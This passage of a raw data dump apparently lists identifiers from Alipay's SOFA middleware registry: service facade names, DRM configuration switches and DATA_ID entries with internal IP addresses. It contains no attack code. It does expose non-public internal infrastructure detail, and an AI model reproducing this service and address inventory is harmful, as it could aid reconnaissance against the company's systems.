he.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.paydecision.service.api.InstPayDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.yunfengdieweb:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:erecon@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.activity.open.ActivityInstanceOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.openapi.clientswitch.ClientSwitchOpsOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.purchases.AssetPurchasesCostQuotationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.qrcode.StuffKouBeiQrCodeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointInstructionQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.paybox.SmartPayBoxRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.44.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ucdp.common.ark.spi.UcdpContentRecallApi:1.0:apshopcenter_pay_success_voucher_recall_api@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.multimediabase.facade.promotion.gift.UserGiftOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.128.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fininfo:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finnet.service.facade.open.api.FinnetApiSendService:1.0:superlink@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.live.api.mock.LivePushMockApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:yanchaobackend#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitydata.common.service.facade.VariableFeatureCompareServiceClient:1.0:variableFeatureCompare@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.InformationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.common.service.facade.orderlink.OrderLinkRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.revcore.oraclerevcore_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mrchportalcore.common.service.facade.reachshop.ShopRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.accrmcore.common.service.facade.CRMLabelSeriesFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.spcenter.facade.bd.BdBrandQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.dasbi.common.service.facade.api.FavoriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.category.PermissionDefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.rule.RuleQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fcriskctrl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.BizParaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mobilecommunity.biz.community.drm.CommunityShareCfgResource.superAdminList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.24.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityidentify.service.iot.IotSecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:antdatashow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antlawCancleReadCollbackServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.membercenterTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.ResidenceRuleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobileclientgw@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.ShopBindInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestprod.common.service.facade.api.FlowInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.SolutionTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.62.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findatacanal.common.service.manage.opendata.OpenDataBizConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.inclusionconf.facade.service.console.MessageConsoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1217_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.aciamcore.common.service.facade.identity.IdpServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financemng.common.facade.service.robot.RobotDataItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.cif.facade.ProxyUserSecurityRiskQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:certifymng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_PUBLICCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pointprod.commom.manage.facade.quickpoint.api.QuickPointConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.stock.isDiscoveryDowngradeFeeds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.fuse.FuseResultHandlerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.push.MsgPushFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.ipciConfigTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.finbankcore.common.service.facade.PointsExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Servers_TP_S_PRODMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.etetestcore.service.api.yeb.YebWorkDayQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:huanyu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opencore.service.facade.api.SystemPropertyManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.custstk.cachecore.drm.GeneralCacheSwitch.chargetbasecache.cacheHitRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:crmhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdatabus.service.facade.lineage.DataLineageService:1.0:zdatabus-compatibility-id@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.serverlesscore.endpoint.dds.rpc.service.SofaGwJzCallBackRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.forbiddenPraise,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.common.service.integration.assettrans.FaAssetTransClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.playcenter.PlayLuckDrawFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.friendsloan.api.FlctransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:insmarketingprod_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.mcard.api.MCardtransQueryFacde:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:anteduprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.dsl.KgDslTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdtunical.common.service.facade.mirrormigrate.MirrorMigrateFromD2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.adminconsole.rolebase.RoleBaseSceneMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.metafacade.facade.service.DataInterface:1.0:test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.138.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkcreditpaybrain.common.service.facade.api.ModelDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.container.facade.api.KgOnlineServiceInvokeFacade:1.0:kgopenfortune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.IConsoleConfigRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.ibizsupport.common.service.facade.api.MerchantBizInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.recruit.GenericOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.debug.ChangeServiceSyncExecuteDebugFacade:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.PositionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotface.facade.smileseries.IotFaceDispatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.callback.FinOpenPushTaskCallback:1.0:finopenscene_bigShowPushTaskCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.auth.api.AuthUserManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.ContentDeliveryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.FundCardInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.DeviceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.ProductAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:mbillexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:idpatrol@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.188.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.scardcenter.common.service.facade.ExpiredTradeOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.endpoint.rest.facade.MonitorRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.158.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.20.194.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.199.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iconnect.common.facade.api.DeliveryCampaignQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.69.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echox.service.EchoxAopPlaybackService:1.0:iexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.upgrade.sdk.common.facade.api.ModeUpgradeStepApi:1.0:data-process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:custcpt@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergw.d6588.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.116.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:easyinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.ProductUpgradeTaskMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.api.apply.LendApplyAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkassetmore.common.service.facade.api.ArApServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.sla.businessroute.drm.BusinessRoutePolicy.whiteListVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.policybench.common.service.facade.api.StatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdistinguish.common.service.facade.MBRZoneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.zongshuEcCustomsInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.project.common.facade.api.ComputeEngineApi:1.0:dpproject@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.insuredAgeRenewalDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.core.service.guardian.BizEventAnalysisResultCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmobile.common.service.facade.consultant.ConsultantServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.extend-request:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_O_HEALTH_CHECK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.infosec.content.service.facade.BacktraceService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.HbaseOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:crmhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FININSIGHTCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.PublicRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.targetUidToKycMockKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.cds.mng.TemplateElementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.221.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpromoscene.core.service.product.ProductNetValueRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbdesk.common.service.facade.api.KbDeskMangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.authorization.TempAuthenticationManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.benefit.facade.view.BenefitViewQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_ANTFOREST_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.69.243.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkassetmore.common.service.facade.api.QualifiedStandardServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue29#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ordercore.contract.common.service.facade.api.ContractTemplateConfigOrderHandleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:securityservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.value.ValueLibraryConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.article.articlereplace.ArticleReplaceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditint.facade.service.PcreditBillInstallmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.billscenter.AssetsBalanceRecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.relation.FamilyRelationInviteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.233.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.core.service.drm.FincomeSnapshotMsgPublishSwitchDrmResourceInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-PCLOANPROMO-DAILY-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ck:name=com.alipay.zdal.config.groupCluster.riskmng_ctubizDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:forexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:zdataservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.switchtaobao.facade.MigrationCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.api.SecOpsChangeServiceFacade:1.0:securityops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue44#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:quezaoweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.130.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_192.168.0.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.zpaas.zappinfo.facade.query.AppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.iotcms.common.service.facade.tradevoice.VoiceMatchSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insclaiminvestprod.facade.common.CommonManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.DecisionService:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.smartbiz.process.service.BizCallback:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.210.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antmember.common.service.facade.rcp.AntmemberRcp4CdpService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.bumng.bumngDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vouchercore.facade.result.VccVoucherResult:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:ecoquality@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:fin.preauthusersubscribe@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.common.service.facade.kborder.OrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.quality.MstQualityCtrlConfDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.biz.event.EventHandler:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promohelix.common.service.facade.api.sci.SciTaskConfigOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custrelation.service.facade.LoadTestTempService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.mide.common.service.facade.api.service.ServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.smdd.facade.isv.LSMDD4IsvShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.metadata.RuleGroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.revol.drm.tenant.cifperm.logKeyType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.biz.service.impl.drm.CacheTrigger.drcCtrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csassistant.service.facade.api.AssistantOutcallNumberSetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchprod.common.service.facade.merchant.MrchProdAttachmentMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insdataprod.common.service.facade.medical.api.MedicalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.feature.FeatureManageGzFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.revmng.common.service.facade.RevmngPriceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditcustsrv.facade.common.trservice.PccsTradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmAsyncReplayManager.asyncReplayTestStep,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.app.cifin.cifObDataSource.attributes.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@opsconfreg#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.virtualprod.common.service.facade.educate.recharge.EduRechargeOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.switchToNewLink,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_F_CERTIFY_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchstm.common.service.facade.mart.facade.MartSkuQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_C_BILL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.nodejs.ConsumerService:1.0:custdecisionweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.execute.DataExecuteDriver:1.0:framodelDataExecuteDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.ssrfPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.finriskeventseek.facade.BusinessColumnServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acgotonecore.facade.service.TemplateFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.ifundcontrolmodel.service.facade.common.IFundModelFacade:1.0:bankDailyBalanceFundModel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.34.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.routeclient.interfacename:clientsc#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securityidentify.service.otp.LisaDataManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.reindeer.TagManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_I